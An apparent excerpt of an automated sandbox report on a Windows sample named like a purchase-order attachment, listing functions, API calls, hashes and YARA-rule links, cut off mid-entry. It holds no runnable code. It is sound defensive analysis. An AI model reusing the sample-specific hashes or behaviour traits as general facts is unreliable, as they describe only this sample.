Opcode Fuzzy Hash: 0ed629ad32a379d639f331eff032c05424b95fb1a9cffe0e5a96631345af4bda
Instruction Fuzzy Hash: AEF169716083019FC710DF25C881B5EB7E5BF88318F14892EF9959B392DB78E949CB86

Function 00AD7DF0 Relevance: 4.6, APIs: 3, Instructions: 89COMMON

Download Yara Rule

APIs

GetComputerNameW.KERNEL32 ref: 00AD7E0F

Memory Dump Source

Source File: 00000000.00000002.2072069896.0000000000AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: ComputerName
String ID:
API String ID: 3545744682-0
Opcode ID: ecc9b2ade8982dcb1e0c5ad9849573950e3db74e800a58aca912b003bf94dbf3
Instruction ID: a147f22b69281d73a18854d28d99c179ae132f80e60af6a945ea35f0d23fbdf0
Opcode Fuzzy Hash: ecc9b2ade8982dcb1e0c5ad9849573950e3db74e800a58aca912b003bf94dbf3
Instruction Fuzzy Hash: 0021DE7564D3446BEA3E57149C0AFBD3A366F61B10F88448BA4CB563D1F6682C08CAA3

Function 0042395C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

__FF_MSGBANNER.LIBCMT ref: 00423973

Part of subcall function 004281C2: __NMSG_WRITE.LIBCMT ref: 004281E9
Part of subcall function 004281C2: __NMSG_WRITE.LIBCMT ref: 004281F3

__NMSG_WRITE.LIBCMT ref: 0042397A

Part of subcall function 0042821F: GetModuleFileNameW.KERNEL32(00000000,004C0312,00000104,00000000,00000001,00000000), ref: 004282B1
Part of subcall function 0042821F: ___crtMessageBoxW.LIBCMT ref: 0042835F

Part of subcall function 00421145: ___crtCorExitProcess.LIBCMT ref: 0042114B
Part of subcall function 00421145: ExitProcess.KERNEL32 ref: 00421154

Part of subcall function 00427C0E: __getptd_noexit.LIBCMT ref: 00427C0E

RtlAllocateHeap.NTDLL(00BC0000,00000000,00000001,00000001,00000000,?,?,0041F507,?,0000000E), ref: 0042399F

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
String ID:
API String ID: 1372826849-0
Opcode ID: 037137f005a41d3e7f23448d6c867b3c8b4c2edbc04952c02118ab1723008725
Instruction ID: 55fc1677af57a8a7660136eab561fac32ed193775503e2d42985e710cb399e89
Opcode Fuzzy Hash: 037137f005a41d3e7f23448d6c867b3c8b4c2edbc04952c02118ab1723008725
Instruction Fuzzy Hash: 9701D6B13452319AE6113F36FC42B2F23689F82729BA0002FF505D7292DBBC9D80866D

Function 0044C6D9 Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,0044C385,?,?,?,?,?,00000004), ref: 0044C6F2
SetFileTime.KERNEL32(00000000,?,00000000,?,?,0044C385,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 0044C708
CloseHandle.KERNEL32(00000000,?,0044C385,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 0044C70F

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: File$CloseCreateHandleTime
String ID:
API String ID: 3397143404-0
Opcode ID: a222b55bfb7e3c9122e2c3c1e0a00ac8846e0e3ba4c61acd4eec9770901b3ece
Instruction ID: 494393b69a2909d6cdb43eca47a58c7b459d0d0b41777f9665b8bdb17d821ec9
Opcode Fuzzy Hash: a222b55bfb7e3c9122e2c3c1e0a00ac8846e0e3ba4c61acd4eec9770901b3ece
Instruction Fuzzy Hash: D1E08632542214B7E7212B54AC4DFCE7B18AF05771F104524FB14691E097B12911879C

Function 0044BB64 Relevance: 4.5, APIs: 3, Instructions: 22COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0044BB72

Part of subcall function 00421C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,00427A85), ref: 00421CB1
Part of subcall function 00421C9D: GetLastError.KERNEL32(00000000,?,00427A85), ref: 00421CC3

_free.LIBCMT ref: 0044BB83
_free.LIBCMT ref: 0044BB95

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 9be2b5beef45e3014043d3abdf219173afad32993680376f9e1db3d5b0d03a7e
Instruction ID: fb99fa3189b7cf6fe02a1e9cca191fa87ce96732a0e011a83902eecb09c11a36
Opcode Fuzzy Hash: 9be2b5beef45e3014043d3abdf219173afad32993680376f9e1db3d5b0d03a7e
Instruction Fuzzy Hash: 08E012A574179146EA24697B7E44EB313CCCF14355B54081FB459E7646CF2CF84085EC

Function 00402322 Relevance: 3.9, APIs: 3, Instructions: 159COMMON

Download Yara Rule

APIs

Part of subcall function 004022A4: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,004024F1), ref: 00402303

GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 004025A1
CoInitialize.OLE32(00000000), ref: 00402618
CloseHandle.KERNEL32(00000000), ref: 0047503A

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: Handle$CloseInitializeMessageRegisterWindow
String ID:
API String ID: 3815369404-0
Opcode ID: 8a4b1e56580051f76ee24fd406250ec50a017d9c58e81692b5d0feeee1738c61
Instruction ID: 467a5c185213abbeff6f391a9cbeb45029f0b355c3efb32a313897462e65bf95
Opcode Fuzzy Hash: 8a4b1e56580051f76ee24fd406250ec50a017d9c58e81692b5d0feeee1738c61
Instruction Fuzzy Hash: 3F71B2B89012818BD384EF5AA994D95BBA4FB5B34879081BFD50AE72B3CB784414CF1C

Function 00AB5A3B Relevance: 3.1, APIs: 2, Instructions: 61threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,00000000,00AB55C0,?,00000000,00000000), ref: 00AB5A51
RtlExitUserThread.NTDLL(00000000), ref: 00AB5B11

Memory Dump Source

Source File: 00000000.00000002.2072069896.0000000000AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: Thread$CreateExitUser
String ID:
API String ID: 4108186749-0
Opcode ID: 10ea8fd2ca0d36daa9c8e029636a0a10194fc004c9ac7aa577c72587961205a6
Instruction ID: af2738757db71521b30e556d6efee2de53d1264450a917579b3af6e929504984
Opcode Fuzzy Hash: 10ea8fd2ca0d36daa9c8e029636a0a10194fc004c9ac7aa577c72587961205a6
Instruction Fuzzy Hash: F8117C20D4DBC14EE7239B7888653E6BFA81F63720F0D06CAD0908E0E3D2594D1C93A3

Function 00403A0F Relevance: 3.1, APIs: 2, Instructions: 59COMMON

Download Yara Rule

APIs

IsThemeActive.UXTHEME ref: 00403A73

Part of subcall function 00421405: __lock.LIBCMT ref: 0042140B

Part of subcall function 00403ADB: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00403AF3
Part of subcall function 00403ADB: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00403B08

Part of subcall function 00403D19: GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,00403AA3,?), ref: 00403D45
Part of subcall function 00403D19: IsDebuggerPresent.KERNEL32(?,?,?,?,00403AA3,?), ref: 00403D57
Part of subcall function 00403D19: GetFullPathNameW.KERNEL32(00007FFF,?,?,004C1148,004C1130,?,?,?,?,00403AA3,?), ref: 00403DC8
Part of subcall function 00403D19: SetCurrentDirectoryW.KERNEL32(?,?,?,00403AA3,?), ref: 00403E48

SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00403AB3

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme__lock
String ID:
API String ID: 924797094-0
Opcode ID: 083c9a419650eb7b3c487a3d42e90ae60b002b2ca7067078e9a128b45e1d4eb7
Instruction ID: 5a1e6fac7f7e4f5efe05a10f66e6517c88bf61964affef9997ff0f491c4f9aa6
Opcode Fuzzy Hash: 083c9a419650eb7b3c487a3d42e90ae60b002b2ca7067078e9a128b45e1d4eb7
Instruction Fuzzy Hash: 6911AC719043409FC300EF2AE945D0EBBE9EF95310F00892FF589832B2DBB49591CB9A

Function 0042E9D2 Relevance: 3.1, APIs: 2, Instructions: 52COMMONLIBRARYCODE

Download Yara Rule

APIs

___lock_fhandle.LIBCMT ref: 0042EA29
__close_nolock.LIBCMT ref: 0042EA42

Part of subcall function 00427BDA: __getptd_noexit.LIBCMT ref: 00427BDA

Part of subcall function 00427C0E: __getptd_noexit.LIBCMT ref: 00427C0E

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: __getptd_noexit$___lock_fhandle__close_nolock
String ID:
API String ID: 1046115767-0
Opcode ID: 8322a7b743970971fcc84277e3b8d07b70dffa53242504ad88308bd68288346b
Instruction ID: 2416ae91324a54d1ce8793c95f0e759c3b4c3b44b30ce6d703663dc6d154f00d
Opcode Fuzzy Hash: 8322a7b743970971fcc84277e3b8d07b70dffa53242504ad88308bd68288346b
Instruction Fuzzy Hash: 0F11C6B2B056708AD711BFA6F84175D3A506F82339FA6438BE4205F1E2C7BC9C4186AD

Function 0041F4EA Relevance: 3.0, APIs: 2, Instructions: 43COMMON

Download Yara Rule

APIs

Part of subcall function 0042395C: __FF_MSGBANNER.LIBCMT ref: 00423973
Part of subcall function 0042395C: __NMSG_WRITE.LIBCMT ref: 0042397A
Part of subcall function 0042395C: RtlAllocateHeap.NTDLL(00BC0000,00000000,00000001,00000001,00000000,?,?,0041F507,?,0000000E), ref: 0042399F

std::exception::exception.LIBCMT ref: 0041F51E
__CxxThrowException@8.LIBCMT ref: 0041F533

Part of subcall function 00426805: RaiseException.KERNEL32(?,?,0000000E,004B6A30,?,?,?,0041F538,0000000E,004B6A30,?,00000001), ref: 00426856

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
String ID:
API String ID: 3902256705-0
Opcode ID: 70cad1e3bd70fdeebabecdf1adf7eb2e6304d00d4650b2fa2f30590b0b56178e
Instruction ID: 7ad46e9193426c8d339f918b5cf2d99cac8a9eaef2833add56b360256c533eb5
Opcode Fuzzy Hash: 70cad1e3bd70fdeebabecdf1adf7eb2e6304d00d4650b2fa2f30590b0b56178e
Instruction Fuzzy Hash: 6EF0A43160422D67DB04BF9DE8019DF77A89F01358FB0842BF90992191DBB8A6C597AD

Function 004235E4 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00427C0E: __getptd_noexit.LIBCMT ref: 00427C0E

__lock_file.LIBCMT ref: 00423629

Part of subcall function 00424E1C: __lock.LIBCMT ref: 00424E3F

__fclose_nolock.LIBCMT ref: 00423634

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: __fclose_nolock__getptd_noexit__lock__lock_file
String ID:
API String ID: 2800547568-0
Opcode ID: d1a9e36aabfa746b74cf3c7e94aba650e42a83fbd7dd24189ef5f7023581c49c
Instruction ID: e0ac56d962211a67bba08426c2dd1c536cda0567d662fd5b2e2ebd868d4dc1e9
Opcode Fuzzy Hash: d1a9e36aabfa746b74cf3c7e94aba650e42a83fbd7dd24189ef5f7023581c49c
Instruction Fuzzy Hash: 7AF09671B01234AAD721AF66A80276E7AB45F41339FA6814FE454AB3C1CB7C8A019A5D

Function 00AB5D20 Relevance: 2.5, APIs: 2, Instructions: 38COMMON

Download Yara Rule

APIs

VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00AB5D6D

Memory Dump Source

Source File: 00000000.00000002.2072069896.0000000000AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: b2c5e5ff31c71c9a2d04ca3a138fa5ebeded73ff39e8cabb934e00f8006b6e21
Instruction ID: 8cd558fa079e1926ef603cac916a83aff80c8ec40718720be5bc3c2d258ef1fe
Opcode Fuzzy Hash: b2c5e5ff31c71c9a2d04ca3a138fa5ebeded73ff39e8cabb934e00f8006b6e21
Instruction Fuzzy Hash: 69F0BEA0E04F00AADE7EEBB8ED4EBF02B6C6F22728F0D4345E2451A0B386521C13C502

Function 00AB5F10 Relevance: 1.7, APIs: 1, Instructions: 223COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2072069896.0000000000AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c80d5a6a02d27edc9ab6d58f5d8643bbeae31c09be81a772befcbcd45ae199ca
Instruction ID: 91c862803327f5b86cbf125de7e72682843cacfbd44ae38a9c2cd0366d3857ab
Opcode Fuzzy Hash: c80d5a6a02d27edc9ab6d58f5d8643bbeae31c09be81a772befcbcd45ae199ca
Instruction Fuzzy Hash: 3D71D031C0CB809ECB3A9B3988147F5FBBC6B66320F4D869AD4958B1A3D279CD449352

Function 0040E8A0 Relevance: 1.7, APIs: 1, Instructions: 196windowCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0040E959

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: MessagePeek
String ID:
API String ID: 2222842502-0
Opcode ID: 933f474a9053b05bc16a2fd55a7a1634dc82e1a2e246d14b81b82702670c5ed1
Instruction ID: fc093b3e9e10bf552c1be73b27f7c8da03df1a2de4767d2e187352050fe1c2e5
Opcode Fuzzy Hash: 933f474a9053b05bc16a2fd55a7a1634dc82e1a2e246d14b81b82702670c5ed1
Instruction Fuzzy Hash: 2F71D6719083848FEB25CF25D44479A7BD0EB55308F0C897FD8899F3A2D7B99885CB4A

Function 00C12038 Relevance: 1.7, APIs: 1, Instructions: 163COMMON

Download Yara Rule

APIs

Part of subcall function 00C118A8: GetFileAttributesW.KERNEL32(?), ref: 00C118B3

CreateDirectoryW.KERNEL32(?,00000000), ref: 00C12182

Memory Dump Source

Source File: 00000000.00000002.2073056889.0000000000C10000.00000040.00000020.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: AttributesCreateDirectoryFile
String ID:
API String ID: 3401506121-0
Opcode ID: afa8d1e3fe8e7b16fa15fd92d3e8d3f63daaa6f2f40d0e8ef1005d43e1b91b7f
Instruction ID: 945b3e7d0a1028bf45be9a0c36a06cd817b87858a48b308eef350347c5b35350
Opcode Fuzzy Hash: afa8d1e3fe8e7b16fa15fd92d3e8d3f63daaa6f2f40d0e8ef1005d43e1b91b7f
Instruction Fuzzy Hash: 2451A435A1120896EF14EFA0D844BEE737AEF58300F108568BA09F7280E7799F44C7A5

Function 00422957 Relevance: 1.6, APIs: 1, Instructions: 135COMMON

Download Yara Rule

APIs

__flush.LIBCMT ref: 00422A0B

Part of subcall function 00427C0E: __getptd_noexit.LIBCMT ref: 00427C0E

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: __flush__getptd_noexit
String ID:
API String ID: 4101623367-0
Opcode ID: ba1b573b9a1c5d238bdcc52ef1885e10968c5b94d85714b9232a10917baff8d1
Instruction ID: 8f2a899de28b9b8ac1dd69c8cddf2acff934126b4057793d23fbf70436a2ef8e
Opcode Fuzzy Hash: ba1b573b9a1c5d238bdcc52ef1885e10968c5b94d85714b9232a10917baff8d1
Instruction Fuzzy Hash: EB41E870700726BFDB288EA9E68056F77A6AF45350F54852FE845C7640DAF8DD818B48

Function 00AB6490 Relevance: 1.6, APIs: 1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2072069896.0000000000AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 30a94bf250d92e3fba99ec90635b8193a08d577e42682136395b56f398947aba
Instruction ID: 8d334a3f077af1a70f2cb3a6203528adb1f73b4833e6e5e5a2425a8609d8aadc
Opcode Fuzzy Hash: 30a94bf250d92e3fba99ec90635b8193a08d577e42682136395b56f398947aba
Instruction Fuzzy Hash: 4331CF71D0C7409ADB359B79C5483F9BBBC6BA2720F4C869AD0898B1A3D67E8C04D752

Function 0041ED18 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32 ref: 0041EDC7

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction ID: e1e9453dff8cdd36c9b53572e70871791048215458511bd1f5cf1fdffc6e0534
Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction Fuzzy Hash: B231FC78A00106DBC718DF1AE4809A9F7B6FF49340B6486A6E809CB355DB34EDC1CB85

Function 00479A75 Relevance: 1.6, APIs: 1, Instructions: 88COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 00479A80

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: e45942e84992e6f3b1645fd07b77c47882f9ff211bf848f68ad3990d9c1ab5da
Instruction ID: 123904f6986cbe28aed5baaaa90aadec874594827bf1280dce4f1c7dc905d36c
Opcode Fuzzy Hash: e45942e84992e6f3b1645fd07b77c47882f9ff211bf848f68ad3990d9c1ab5da
Instruction Fuzzy Hash: D2416D705086118FDB24DF14C044B5ABBE1BF85308F1989ADE99A4B362C37AFC86CF56

Function 004041A9 Relevance: 1.6, APIs: 1, Instructions: 63libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00404214: FreeLibrary.KERNEL32(00000000,?), ref: 00404247

LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,004039FE,?,00000001), ref: 004041DB

Part of subcall function 00404291: FreeLibrary.KERNEL32(00000000), ref: 004042C4

Memory Dump Source

